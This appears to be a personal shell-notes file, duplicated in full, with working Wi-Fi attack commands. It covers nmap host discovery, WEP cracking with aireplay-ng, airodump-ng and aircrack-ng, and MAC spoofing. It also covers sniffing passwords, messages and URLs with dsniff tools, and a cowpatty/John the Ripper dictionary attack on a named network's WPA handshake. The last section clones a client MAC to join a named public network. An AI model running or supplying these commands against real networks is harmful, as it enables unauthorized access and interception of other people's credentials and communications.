epcim/wifi-hacking.howto.sh

## wifi-hacking.howto.sh

##-- repeatedly find hosts --
IP_RANGE=172.25.25.0-254
HOST_LIST=HostList
HOST_LIST_NEW=.tmp_hln
TMP_NEWIP=.tmp_newip
touch $HOST_LIST
nmap -sL -e eth0 -PI -PT -T2 -PS $IP_RANGE | grep -B1 MAC | grep -v "\-\-" | sed -e 's/not scanned//' > $HOST_LIST_NEW
for i in `grep Host $HOST_LIST_NEW| awk '{print $2}'`; do [ `grep $i $HOST_LIST | wc -l` -eq 0 ] && echo $i; done > $TMP_NEWIP
for i in `cat $TMP_NEWIP`; do grep -A1 $i $HOST_LIST_NEW; done >> $HOST_LIST
## Mark UP hosts
sed -e 's/ - IS UP NOW//' $HOST_LIST > $HOST_LIST.tmp; mv $HOST_LIST.tmp $HOST_LIST;
for i in `grep Host $HOST_LIST_NEW | awk '{print $2}'`; do sed -e "s/$i/$i - IS UP NOW/g" $HOST_LIST > $HOST_LIST.tmp; mv $HOST_LIST.tmp $HOST_LIST; done
---------------------------


 sudo aireplay-ng -b 00:0B:6B:4D:FD:38 -h 00:4F:62:11:01:25 --arpreplay eth0
 sudo airodump-ng --ivs --channel 10 --write kralovice eth0
 sudo aircrack-ng eth0 kralovice 11 1
 sudo macchanger -m 00:4F:62:11:01:25 eth0

kismet
pmi-driftnet -f /tmp/kismet_dump
tail --lines=+1 -f /tmp/Kismet-Dec-28-2007-9.dump | dsniff -p -
tail --lines=+1 -f /tmp/Kismet-Dec-28-2007-9.dump | msgsnarf -p -
tail --lines=+1 -f /tmp/Kismet-Dec-28-2007-9.dump | webspy -p - HOST

9:38> qlist dsniff |grep bin                                                                                                    <epcim@dontpanic:~/tmp
/usr/sbin/dnsspoof
/usr/sbin/filesnarf
/usr/sbin/macof
/usr/sbin/sshow
/usr/sbin/tcpkill
/usr/sbin/tcpnice
/usr/sbin/sshmitm
/usr/sbin/dsniff
/usr/sbin/webspy
/usr/sbin/urlsnarf
/usr/sbin/arpspoof
/usr/sbin/webmitm
/usr/sbin/mailsnarf
/usr/sbin/msgsnarf


###########
Another small problem, tcpreplay doesn't understand 802.11 headers:

slax ~ # tcpreplay -i lo dump.cap
sending on: lo
validate_l2(): Unsupported datalink type: 802.11 (0x69)

No to worry, airdecap-ng can convert the capture to straight ethernet. Normally you use this program to decrypt encrypted 802.11 data, but you can
also use it just to strip the 802.11 headers:

slax ~ # airdecap-ng dump.cap
Total number of packets read 256828
Total number of WEP data packets 315
Total number of WPA data packets 0
Number of plaintext data packets 42287
Number of decrypted WEP packets 0
Number of decrypted WPA packets 0

This creates a file named dump-dec.cap. If you need to decrypt the data as well, just include the necessary parameters (for example -e and -w) in the
airdecap-ng command.

Now we're going to replay the data on the local loopback ethernet interface (lo). This gives us an interface to send the data on without actually
sending it out over the air or on the local network.

First start your programs to listen on the local interface (in different sessions of course, so you can see the output of each):

slax ~ # dsniff -i lo
slax ~ # driftnet -i lo
slax ~ # urlsnarf -i lo
slax ~ # msgsnarf -i lo

Then run tcpreplay (the -R option speeds up the replay):

slax ~ # tcpreplay -i lo -R dump-dec.cap


# PMi
# Kismet

sudo kismet_server
#tee -a /tmp/kismet_dump.tee < /tmp/kismet_dump
tee /tmp/kismet_dump.tee < /tmp/kismet_dump | dsniff -p -
tail --lines=+1 -f /tmp/kismet_dump.tee     | urlsnarf -p -
kismet_client


# WPA - brute force dict key hack, example for "edward1218"

 1. locate network with kismet/capture some data (four-way handshake)
    Alternatively:

 #   sudo airodump-ng --channel 11 --bssid 00:24:B2:8C:8A:BA --write ./airodump-edward-ch11.dump wlan0

 2. fun dict attack with cowpatty 4.6

 #   cd ~/tmp/crackers/cowpatty-4.6
 #   ./cowpatty -r ~/tmp/akl-wifihack/airodump-edward-ch11.dump-01.cap -f /home/epcim/tmp/crackers/wpalist.txt -s "edward1218"

 3. try luck

 #  echo edward1218 > tryfirst.john                                                                                 <epcim@adrika-netbk:~/tmp
 #  echo edward >> tryfirst.john
 #  john -session:/tmp/delme -wordlist:tryfirst.john -rules -stdout | ./cowpatty -r ~/tmp/akl-wifihack/airodump-edward-ch11.dump-01.cap -f - -s "edward1218"

 4. if no success, try john ripper

 #  shuffe
 #   john -wordlist:/hg2g/av/wpalist-shuf.txt -rules -session:/tmp/johnrestore.dat -stdout:63 | ./cowpatty -r ~/tmp/akl-wifihack/airodump-edward-ch11.dump-01.cap -f - -s "edward1218"
 #  a-z
 #   john -wordlist:/home/epcim/tmp/crackers/wpalist.txt -rules -session:johnrestore.dat -stdout:63 | ./cowpatty -r ~/tmp/akl-wifihack/airodump-edward-ch11.dump-01.cap -f - -s "edward1218"


# Behave as another client

export NMAC=00:16:CE:4A:15:7D

sudo ifconfig wlan0 down
sudo macchanger -m "$NMAC" wlan0

sudo iwconfig wlan0 mode Managed
sudo iwconfig wlan0 ap 00:23:69:3A:DC:3A
sudo iwconfig wlan0 essid "Zenbu.net.nz - Muri Beach"
sudo iwconfig wlan0 channell 1
sudo iwconfig wlan0 frag 256
sudo iwconfig wlan0 retry 3
sudo iwconfig wlan0 txpower 20
sudo ifconfig wlan0 up

sudo ifconfig wlan0 inet 10.10.24.89 netmask 255.255.255.0;
sudo route set default gw 10.10.24.1

	##-- repeatedly find hosts --
	IP_RANGE=172.25.25.0-254
	HOST_LIST=HostList
	HOST_LIST_NEW=.tmp_hln
	TMP_NEWIP=.tmp_newip
	touch $HOST_LIST
	nmap -sL -e eth0 -PI -PT -T2 -PS $IP_RANGE \| grep -B1 MAC \| grep -v "\-\-" \| sed -e 's/not scanned//' > $HOST_LIST_NEW
	for i in `grep Host $HOST_LIST_NEW\| awk '{print $2}'`; do [ `grep $i $HOST_LIST \| wc -l` -eq 0 ] && echo $i; done > $TMP_NEWIP
	for i in `cat $TMP_NEWIP`; do grep -A1 $i $HOST_LIST_NEW; done >> $HOST_LIST
	## Mark UP hosts
	sed -e 's/ - IS UP NOW//' $HOST_LIST > $HOST_LIST.tmp; mv $HOST_LIST.tmp $HOST_LIST;
	for i in `grep Host $HOST_LIST_NEW \| awk '{print $2}'`; do sed -e "s/$i/$i - IS UP NOW/g" $HOST_LIST > $HOST_LIST.tmp; mv $HOST_LIST.tmp $HOST_LIST; done
	---------------------------



	sudo aireplay-ng -b 00:0B:6B:4D:FD:38 -h 00:4F:62:11:01:25 --arpreplay eth0
	sudo airodump-ng --ivs --channel 10 --write kralovice eth0
	sudo aircrack-ng eth0 kralovice 11 1
	sudo macchanger -m 00:4F:62:11:01:25 eth0

	kismet
	pmi-driftnet -f /tmp/kismet_dump
	tail --lines=+1 -f /tmp/Kismet-Dec-28-2007-9.dump \| dsniff -p -
	tail --lines=+1 -f /tmp/Kismet-Dec-28-2007-9.dump \| msgsnarf -p -
	tail --lines=+1 -f /tmp/Kismet-Dec-28-2007-9.dump \| webspy -p - HOST

	9:38> qlist dsniff \|grep bin <epcim@dontpanic:~/tmp
	/usr/sbin/dnsspoof
	/usr/sbin/filesnarf
	/usr/sbin/macof
	/usr/sbin/sshow
	/usr/sbin/tcpkill
	/usr/sbin/tcpnice
	/usr/sbin/sshmitm
	/usr/sbin/dsniff
	/usr/sbin/webspy
	/usr/sbin/urlsnarf
	/usr/sbin/arpspoof
	/usr/sbin/webmitm
	/usr/sbin/mailsnarf
	/usr/sbin/msgsnarf






	###########
	Another small problem, tcpreplay doesn't understand 802.11 headers:

	slax ~ # tcpreplay -i lo dump.cap
	sending on: lo
	validate_l2(): Unsupported datalink type: 802.11 (0x69)

	No to worry, airdecap-ng can convert the capture to straight ethernet. Normally you use this program to decrypt encrypted 802.11 data, but you can
	also use it just to strip the 802.11 headers:

	slax ~ # airdecap-ng dump.cap
	Total number of packets read 256828
	Total number of WEP data packets 315
	Total number of WPA data packets 0
	Number of plaintext data packets 42287
	Number of decrypted WEP packets 0
	Number of decrypted WPA packets 0

	This creates a file named dump-dec.cap. If you need to decrypt the data as well, just include the necessary parameters (for example -e and -w) in the
	airdecap-ng command.

	Now we're going to replay the data on the local loopback ethernet interface (lo). This gives us an interface to send the data on without actually
	sending it out over the air or on the local network.

	First start your programs to listen on the local interface (in different sessions of course, so you can see the output of each):

	slax ~ # dsniff -i lo
	slax ~ # driftnet -i lo
	slax ~ # urlsnarf -i lo
	slax ~ # msgsnarf -i lo

	Then run tcpreplay (the -R option speeds up the replay):

	slax ~ # tcpreplay -i lo -R dump-dec.cap





	# PMi
	# Kismet

	sudo kismet_server
	#tee -a /tmp/kismet_dump.tee < /tmp/kismet_dump
	tee /tmp/kismet_dump.tee < /tmp/kismet_dump \| dsniff -p -
	tail --lines=+1 -f /tmp/kismet_dump.tee \| urlsnarf -p -
	kismet_client



	# WPA - brute force dict key hack, example for "edward1218"

	1. locate network with kismet/capture some data (four-way handshake)
	Alternatively:

	# sudo airodump-ng --channel 11 --bssid 00:24:B2:8C:8A:BA --write ./airodump-edward-ch11.dump wlan0

	2. fun dict attack with cowpatty 4.6

	# cd ~/tmp/crackers/cowpatty-4.6
	# ./cowpatty -r ~/tmp/akl-wifihack/airodump-edward-ch11.dump-01.cap -f /home/epcim/tmp/crackers/wpalist.txt -s "edward1218"

	3. try luck

	# echo edward1218 > tryfirst.john <epcim@adrika-netbk:~/tmp
	# echo edward >> tryfirst.john
	# john -session:/tmp/delme -wordlist:tryfirst.john -rules -stdout \| ./cowpatty -r ~/tmp/akl-wifihack/airodump-edward-ch11.dump-01.cap -f - -s "edward1218"

	4. if no success, try john ripper

	# shuffe
	# john -wordlist:/hg2g/av/wpalist-shuf.txt -rules -session:/tmp/johnrestore.dat -stdout:63 \| ./cowpatty -r ~/tmp/akl-wifihack/airodump-edward-ch11.dump-01.cap -f - -s "edward1218"
	# a-z
	# john -wordlist:/home/epcim/tmp/crackers/wpalist.txt -rules -session:johnrestore.dat -stdout:63 \| ./cowpatty -r ~/tmp/akl-wifihack/airodump-edward-ch11.dump-01.cap -f - -s "edward1218"





	# Behave as another client

	export NMAC=00:16:CE:4A:15:7D

	sudo ifconfig wlan0 down
	sudo macchanger -m "$NMAC" wlan0

	sudo iwconfig wlan0 mode Managed
	sudo iwconfig wlan0 ap 00:23:69:3A:DC:3A
	sudo iwconfig wlan0 essid "Zenbu.net.nz - Muri Beach"
	sudo iwconfig wlan0 channell 1
	sudo iwconfig wlan0 frag 256
	sudo iwconfig wlan0 retry 3
	sudo iwconfig wlan0 txpower 20
	sudo ifconfig wlan0 up

	sudo ifconfig wlan0 inet 10.10.24.89 netmask 255.255.255.0;
	sudo route set default gw 10.10.24.1